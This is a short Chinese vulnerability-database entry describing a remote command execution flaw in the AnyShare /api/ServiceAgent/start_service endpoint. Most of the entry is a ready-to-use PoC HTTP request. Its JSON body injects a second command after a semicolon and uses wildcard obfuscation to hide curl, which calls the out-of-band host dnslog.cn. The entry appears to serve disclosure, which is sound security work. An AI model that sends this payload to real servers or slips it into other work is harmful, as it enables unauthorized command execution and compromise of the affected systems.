爱数-AnyShare start_service 远程命令执行漏洞

日期: 2025-07-01 19:18:29 | 影响软件: 爱数AnyShare | POC: 已公开

漏洞描述

爱数 anyshare /api/ServiceAgent/start_service 接口存在命令注入漏洞,如被攻击者利用可能导致服务器沦陷

PoC代码

POST /api/ServiceAgent/start_service HTTP/1.1
Host: 

["ccc;/u?r/b?n/c??l dnslog.cn"]

相关漏洞推荐